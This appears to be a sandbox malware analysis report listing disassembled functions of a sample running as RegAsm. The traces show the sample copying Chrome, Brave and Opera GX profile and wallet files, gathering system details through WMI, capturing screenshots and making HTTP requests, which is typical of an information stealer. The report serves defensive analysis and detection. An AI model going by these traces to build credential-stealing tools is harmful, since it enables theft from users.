                                                                                                                                                        • StrCmpCA.SHLWAPI(0040CCE9), ref: 0040A279
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0040A35C
                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,0043738C,004367FB), ref: 0040A41C
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A4C1
                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040A522
                                                                                                                                                          • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FD4
                                                                                                                                                          • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FEF
                                                                                                                                                          • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 00409970
                                                                                                                                                          • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 0040998B
                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0040A553
                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,004373A0,00436802), ref: 0040A613
                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040A6AA
                                                                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 0040A76E
                                                                                                                                                        • FindClose.KERNEL32(?), ref: 0040A782
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Filelstrcpylstrlen$Find$CopyDeletelstrcat$CloseFirstNextSystemTime
                                                                                                                                                        • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                                                        • API String ID: 3650549319-1189830961
                                                                                                                                                        • Opcode ID: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
                                                                                                                                                        • Instruction ID: a20a882fd3e2cf19c19de5c34085d4fd9f009afcaba82f6ce1c70ae1e393a276
                                                                                                                                                        • Opcode Fuzzy Hash: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
                                                                                                                                                        • Instruction Fuzzy Hash: 7D422A3194012D9BCF21FB65DD46BCD7775AF04308F4101AAB848B31A2DB79AED98F89
                                                                                                                                                        Function 6C6035A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294stringtimeCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 2575 6c6035a0-6c6035be 2576 6c6035c4-6c6035ed InitializeCriticalSectionAndSpinCount getenv 2575->2576 2577 6c6038e9-6c6038fb call 6c63b320 2575->2577 2579 6c6035f3-6c6035f5 2576->2579 2580 6c6038fc-6c60390c strcmp 2576->2580 2583 6c6035f8-6c603614 QueryPerformanceFrequency 2579->2583 2580->2579 2582 6c603912-6c603922 strcmp 2580->2582 2584 6c603924-6c603932 2582->2584 2585 6c60398a-6c60398c 2582->2585 2586 6c60361a-6c60361c 2583->2586 2587 6c60374f-6c603756 2583->2587 2590 6c603622-6c60364a _strnicmp 2584->2590 2591 6c603938 2584->2591 2585->2583 2586->2590 2592 6c60393d 2586->2592 2588 6c60375c-6c603768 2587->2588 2589 6c60396e-6c603982 2587->2589 2593 6c60376a-6c6037a1 QueryPerformanceCounter EnterCriticalSection 2588->2593 2589->2585 2594 6c603650-6c60365e 2590->2594 2595 6c603944-6c603957 _strnicmp 2590->2595 2591->2587 2592->2595 2598 6c6037b3-6c6037eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 2593->2598 2599 6c6037a3-6c6037b1 2593->2599 2596 6c603664-6c6036a9 GetSystemTimeAdjustment 2594->2596 2597 6c60395d-6c60395f 2594->2597 2595->2594 2595->2597 2600 6c603964 2596->2600 2601 6c6036af-6c603749 call 6c63c110 2596->2601 2602 6c6037fc-6c603839 LeaveCriticalSection 2598->2602 2603 6c6037ed-6c6037fa 2598->2603 2599->2598 2600->2589 2601->2587 2605 6c603846-6c6038ac call 6c63c110 2602->2605 2606 6c60383b-6c603840 2602->2606 2603->2602 2610 6c6038b2-6c6038ca 2605->2610 2606->2593 2606->2605 2611 6c6038cc-6c6038db 2610->2611 2612 6c6038dd-6c6038e3 2610->2612 2611->2610 2611->2612 2612->2577
                                                                                                                                                        APIs
                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6C68F688,00001000), ref: 6C6035D5
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6035E0
                                                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 6C6035FD
                                                                                                                                                        • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C60363F
                                                                                                                                                        • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C60369F
                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C6036E4
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6C603773
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68F688), ref: 6C60377E
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68F688), ref: 6C6037BD
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6C6037C4
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68F688), ref: 6C6037CB
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68F688), ref: 6C603801
                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C603883
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C603902
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C603918
                                                                                                                                                        • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C60394C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                        • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                                                        • API String ID: 301339242-3790311718
                                                                                                                                                        • Opcode ID: 6d400835a38ead455e3c0a52826a322bf4c1c202bd60ec5f8fd97a6a3ecaeb17
                                                                                                                                                        • Instruction ID: 77c03169ab34dfd063cd06764ccb9386e61cc40c37245df8d397b4e71293c8d1
                                                                                                                                                        • Opcode Fuzzy Hash: 6d400835a38ead455e3c0a52826a322bf4c1c202bd60ec5f8fd97a6a3ecaeb17
                                                                                                                                                        • Instruction Fuzzy Hash: FCB1D875B0A310AFDB08DF2AC99461A77F5BB8B701F148A3DE499D3750D73098418BAE
                                                                                                                                                        Function 00415FD1 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 205stringfileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$wsprintf$Find$File$CloseFirstMatchNextPathSpec
                                                                                                                                                        • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                        • API String ID: 3541214880-445461498
                                                                                                                                                        • Opcode ID: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
                                                                                                                                                        • Instruction ID: e3980370ac94f341e4db787ecefa849356652b5b9a50b55dc8137c0c02bcad1e
                                                                                                                                                        • Opcode Fuzzy Hash: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
                                                                                                                                                        • Instruction Fuzzy Hash: FC81277190022DABCF60EF61CC45ACD77B9FB08305F0194EAE549A3150EE39AA898F94
                                                                                                                                                        Function 00411807 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                                                                                        • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                                                                                          • Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                                                                                                          • Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                                                                                          • Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                                                                                          • Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
                                                                                                                                                          • Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                                                                                          • Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411916
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0041191D
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0041195C
                                                                                                                                                        • wsprintfA.USER32 ref: 00411949
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                        • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                                                        • API String ID: 2280294774-461178377
                                                                                                                                                        • Opcode ID: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
                                                                                                                                                        • Instruction ID: 9b83a2dca4a1b3c6c0afd6b9e082c19a49acb0dc1fc89349d09b2b61b6485616
                                                                                                                                                        • Opcode Fuzzy Hash: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
                                                                                                                                                        • Instruction Fuzzy Hash: F7418D71940209BBCB20CBD5DC89EEFBBBDEFC9B11F20411AF611A6190D7799941CB28
                                                                                                                                                        Function 0041C472 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: /$UT
                                                                                                                                                        • API String ID: 0-1626504983
                                                                                                                                                        • Opcode ID: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
                                                                                                                                                        • Instruction ID: 63eef66cd8fe0e336db70064ed11a5ad7b696d25642cb4984019eb1642be8bef
                                                                                                                                                        • Opcode Fuzzy Hash: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
                                                                                                                                                        • Instruction Fuzzy Hash: 8E027DB19442698BDF21DF64CC807EEBBB5AF45304F0440EAD948AB242D7389EC5CF99
                                                                                                                                                        Function 00406963 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161networkfileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                                                        • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                                                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                                                        • InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00406B50
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00406B5C
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00406B68
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                                                        • String ID: ERROR$ERROR$GET
                                                                                                                                                        • API String ID: 3863758870-2509457195
                                                                                                                                                        • Opcode ID: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
                                                                                                                                                        • Instruction ID: 58d07afc169a1ce0b47171bb7ce7cc0903f1f08f96176c9b1f2a19a3da15bd67
                                                                                                                                                        • Opcode Fuzzy Hash: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
                                                                                                                                                        • Instruction Fuzzy Hash: 9D51AEB1A00269AFDF20EB60DC84AEEB7B9FB04304F0181B6F549B2190DA755EC59F94
                                                                                                                                                        Function 00411F55 Relevance: 24.1, APIs: 16, Instructions: 147windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F96
                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00411FA4
                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00411FB1
                                                                                                                                                        • GetDC.USER32(00000000), ref: 00411FB8
                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00411FC1
                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FD1
                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00411FDE
                                                                                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FFA
                                                                                                                                                        • GetHGlobalFromStream.COMBASE(?,?), ref: 00412049
                                                                                                                                                        • GlobalLock.KERNEL32(?), ref: 00412052
                                                                                                                                                        • GlobalSize.KERNEL32(?), ref: 0041205E
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                                                                          • Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                                                                                          • Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 004120BC
                                                                                                                                                        • DeleteObject.GDI32(?), ref: 004120D7
                                                                                                                                                        • DeleteObject.GDI32(?), ref: 004120E0
                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 004120E8
                                                                                                                                                        • CloseWindow.USER32(00000000), ref: 004120EF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2610876673-0
                                                                                                                                                        • Opcode ID: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
                                                                                                                                                        • Instruction ID: f6e3f0428e96004f8b83f7710fafbd9962f3d673da3a1d35a18d8dcfea6c860f
                                                                                                                                                        • Opcode Fuzzy Hash: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
                                                                                                                                                        • Instruction Fuzzy Hash: 0251EA72800218AFDF15EFA1ED498EE7FBAFF08319F045525F901E2120E7369A55DB61
                                                                                                                                                        Function 0041543D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • wsprintfA.USER32 ref: 0041546A
                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00415481
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00436A80), ref: 004154A2
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00436A84), ref: 004154BC
                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 0041550D
                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00415520
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415534
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415547
                                                                                                                                                        • lstrcatA.KERNEL32(?,00436A88), ref: 00415559
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 0041556D
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
